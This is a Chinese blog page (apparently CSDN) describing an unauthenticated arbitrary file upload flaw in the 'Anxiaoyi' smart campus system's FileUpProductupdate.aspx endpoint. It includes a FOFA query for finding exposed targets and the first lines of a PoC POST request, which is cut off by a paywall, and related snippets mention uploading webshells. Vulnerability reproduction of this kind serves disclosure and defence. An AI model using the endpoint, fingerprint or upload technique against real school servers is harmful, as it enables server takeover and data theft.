智慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传漏洞复现

已于 2024-08-13 20:00:06 修改
阅读量870 收藏 1
点赞数 6
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-05-24 14:31:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/139174072
版权
本文介绍了“安校易”智慧校园管理系统中存在的一处任意文件上传漏洞,详细阐述了漏洞概述、复现环境及复现过程。攻击者能利用该漏洞上传恶意文件,执行任意代码,影响服务器安全。修复建议包括限制接口访问权限和升级到安全版本。
摘要由CSDN通过智能技术生成

0x01 产品简介

“安校易”是银达云创公司基于多年教育市场信息化建设经验沉淀,经过充分的客户需求调研,并依据国家“十三五”教育信息化建设规范而推出的综合互联网+教育信息化解决方案。“安校易”以物联网技术为基础,以学生在校“学食住行”管理为中心,将消费管理、门禁管理、各类学生出入管理、家校互通、校门口进出身份识别等系统进行集成,有效减少校园管理盲点,提升校园安全防范与管理水平。

0x02 漏洞概述

智慧校园(安校易)管理系统 FileUpProductupdate.aspx 接口处存在任意文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。

0x03 复现环境

FOFA:title="智慧综合管理平台登入"

0x04 漏洞复现

PoC

POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
X-Requested-With: XMLHttpRequest
Content
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
智慧校园信息管理系统存在任意文件上传漏洞
千寻的博客
07-22 157
智慧校园信息管理系统PSE`存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
智慧校园管理系统 前台任意文件上传漏洞
孤桜懶契
03-31 3604
漏洞描述 智慧校园管理系统前台注册页面存在文件上传,由于没有对上传的文件进行审查导致可上传恶意文件控制服务器 漏洞影响 s ✅智慧校园管理系统 空间测绘 d ⭕body="DC_Login/QYSignUp" 漏洞复现 ✅企业注册界面存在漏洞 上传附件 上传一个冰蝎马 会有返回路径 连接地址 个人博客 孤桜懶契:https://gylq.gitee.io/time ...
漏洞复现智慧校园(安校)管理系统 FileUpProductupdate.aspx 任意文件上传漏洞
凝聚力安全团队
06-28 425
智慧校园(安校)管理系统 FileUpProductupdate.aspx 接口处存在任意文件上传漏洞,未经过身份认证的远程攻击者可利用此漏洞上传任意文件,最终可导致服务器失陷。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 821
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
1day未公开 智慧校园安校管理系统FileUpAd任意文件上传漏洞
weixin_43167326的博客
08-14 669
"安校"以物联网技术为基础,以学生在校"学食住行"管理为中心,将消费管理、门禁管理、各类学生出入管理、家校互通、校门口进出身份识别等系统进行集成,有效减少校园管理盲点,提升校园安全防范与管理水平。同时,"安校"又以大数据、人脸识别技和移动互联网为核心技术,以"安全·安心·沟通"为核心诉求,在教育局、学校、家长之间构建一个和谐高效和智慧的沟通互动平台,促进教育合力和智慧教育生态体系成型,做到让学校管理安全、让老师管理快捷、让领导科学决策和让家长安心放心。
智慧校园(安校)管理系统 FileUpAd.aspx 文件上传致RCE漏洞复现
0xSec
08-13 499
智慧校园(安校)管理系统 FileUpAd.aspx 接口处存在任意文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。
智慧校园(安校)管理系统Module接口存在任意文件上传漏洞
weixin_43167326的博客
05-27 991
安校”是银达云创公司基于多年教育市场信息化建设经验沉淀,经过充分的客户需求调研,并依据国家“十三五”教育信息化建设规范而推出的综合互联网+教育信息化解决方案。“安校”以物联网技术为基础,以学生在校“学食住行”管理为中心,将消费管理、门禁管理、各类学生出入管理、家校互通、校门口进出身份识别等系统进行集成,有效减少校园管理盲点,提升校园安全防范与管理水平。福州银达云创信息科技有限公司智慧校园(安校)管理系统存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
学校管理_管理信息系统_ASPX.net_学生管理_
09-29
【标题】"学校管理_管理信息系统_ASPX.net_学生管理_" 涉及的核心是构建一个基于ASPX.NET技术的学校管理系统,该系统主要针对学生的管理,同时也可能包括对教师和其他教育资源的管理。ASPX.NET是微软开发的Web应用...
初中校园校务管理系统 v20130928.rar
07-09
“初中校园校务管理系统”是一套面向初中的初中校园校务管理系统。 系统可以对初中学校的教学环境进行基础的配置。 系统可以对平台的使用人员(如校长、年段长、班主任、课任老师)进行后台维护,可以进行权限的...
Asp.net文件在线管理系统源码_aspx开发教程.7z
09-09
Asp.NET 文件在线管理系统源码是一个基于ASP.NET技术构建的应用程序,用于管理和处理网络上的文件。这个源码实例为开发者提供了一个学习和实践ASP.NET Web应用程序开发,特别是针对文件操作和管理功能的理想平台。在...
小学校园校务管理系统 v20130828.rar
07-09
“小学校园校务管理系统”是一套面向小学的校务管理系统。 系统可以对小学学校的教学环境进行基础的配置。 系统可以对平台的使用人员(如校长、年段长、班主任、课任老师)进行后台维护,可以进行权限的配置。 ...
CMS.zip_ cms_Csharp cms_C# 管理系统_cms_cms aspx source code
09-21
【标题】"CMS.zip"是一个基于C#编程语言开发的内容管理系统(CMS)源代码包,专为"Cms_CSharp"设计。"Cms_C#"指的是这个系统利用了C#的强大功能来构建,以实现高效、灵活的网站内容管理。"Cms"是Content Management...
特洛伊木马:现代网络安全的隐形威胁
weixin_48579910的博客
08-16 683
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
【办公软件】安全风险 Microsoft 已阻止宏运行,因为此文件的来源不受信任
最新发布
一点硬件
08-20 198
安全风险 Microsoft 已阻止宏运行 因为此文件的来源不受信任
《向量数据库指南》——解决方案:采用安全、高性能的Milvus Cloud向量数据库,赋能Dopple AI的创新与发展
LCHub低代码社区
08-15 104
面对不断涌现的新模型和技术的快速演变,Sam和他的团队需要付出巨大的努力来保持竞争力。在未来的日子里,随着Dopple AI业务的不断壮大和技术的持续演进,我们有理由相信,Zilliz Cloud将继续发挥其关键作用,为Dopple AI的成功之路提供坚实的支撑。此外,Zilliz Cloud还提供了丰富的API和灵活的数据管理工具,使得Dopple AI的团队能够更加便捷地进行数据操作和应用开发。Zilliz Cloud作为一款全托管的向量数据库服务,不仅提供了出色的性能和安全性,还具备真正的扩展能力。
如何选择较为安全的第三方依赖版本?
极客星云-CSDN博客
08-16 170
本篇博文分享如何选择较为安全的第三方依赖版本的方法。
aspx如何绑定aspx.cs文件
05-15
ASP.NET 中,可以使用 `CodeFile` 或 `CodeBehind` 属性将 .aspx 页面与 .aspx.cs 文件绑定。 1. 使用 CodeFile 属性绑定: 在 .aspx 页面的 `@Page` 指令中添加 `CodeFile` 属性,指定 .aspx.cs 文件的路径。 示例代码: ```aspx <%@ Page Language="C#" CodeFile="Default.aspx.cs" Inherits="Default" %> ``` 2. 使用 CodeBehind 属性绑定: 在 .aspx 页面的 `@Page` 指令中添加 `CodeBehind` 属性,指定 .aspx.cs 文件的路径。 示例代码: ```aspx <%@ Page Language="C#" CodeBehind="Default.aspx.cs" Inherits="Default" %> ``` 注意:CodeFile 和 CodeBehind 只能使用其中一个属性进行绑定,不能同时使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值